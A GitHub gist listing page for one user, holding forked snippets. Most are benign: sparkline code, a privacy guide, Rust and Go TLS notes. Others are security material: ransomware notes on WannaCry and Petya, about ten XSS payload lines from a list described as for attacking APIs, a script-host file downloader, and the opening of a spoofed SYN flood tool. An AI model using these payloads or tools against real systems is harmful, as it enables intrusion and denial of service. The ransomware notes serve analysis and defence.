@DeadNumbers
DeadNumbers / sparks.py
Last active August 29, 2015 14:27 — forked from stefanv/sparks.py
Command line sparks in Python
#!/usr/bin/python
# coding=utf-8
# Python version of Zach Holman's "spark"
# https://github.com/holman/spark
# by Stefan van der Walt <stefan@sun.ac.za>
"""
USAGE:
@DeadNumbers
DeadNumbers / gist:dd460081bbc39104f2a4
Created October 8, 2015 17:35 — forked from atcuno/gist:3425484ac5cce5298932
HowTo: Privacy & Security Conscious Browsing

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents

@DeadNumbers
DeadNumbers / rust_wine.md
Created August 15, 2016 10:20 — forked from vi/rust_wine.md
Using Rust in Wine as a sort of cross-compiler

Cross-compiling Rust from Linux to Windows using Wine

0. Ensure Rust works on Host

Let's create a dummy project for a test.

$ cargo new test
$ cd test/
$ mkdir examples

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS17-010. It uses EternalBlue (MS17-010) to propagate.
  • Ransom: between $300 and $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up, the virus exits instead of infecting the host (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

@DeadNumbers
DeadNumbers / 666_lines_of_XSS_vectors.html
Created May 31, 2017 17:49 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@DeadNumbers
DeadNumbers / httpget.js
Created June 13, 2017 19:05 — forked from duncansmart/httpget.js
Download a file with Windows Script Host
// httpget.js: download a file (Windows Script Host)
// usage: cscript httpget.js <url> <file>
(function() {
if (WScript.Arguments.Length != 2) {
WScript.Echo("Usage: httpget.js <url> <file>")
WScript.Quit(1)
}
var url = WScript.Arguments(0)
@DeadNumbers
DeadNumbers / golang-tls.md
Created June 21, 2017 11:11 — forked from denji/golang-tls.md
Simple Golang HTTPS/TLS Examples

Moved to git repository: https://github.com/denji/golang-tls

Generate private key (.key)
# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048

# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List the supported ECDSA curves (openssl ecparam -list_curves)

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C Ransomware attack.

Got new info? Email isox@vulners.com or @isox_xx. Some wrong info? Leave a comment, we will fix it!

Research list

@DeadNumbers
DeadNumbers / ssyn.c
Created July 10, 2017 09:54 — forked from z0mbiehunt3r/ssyn.c
Spoofed SYN by eKKiM - ssyn.c
/*
Spoofed SYN by eKKiM
Educational purpose only please.
Compile with
gcc syn.c -pthread
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>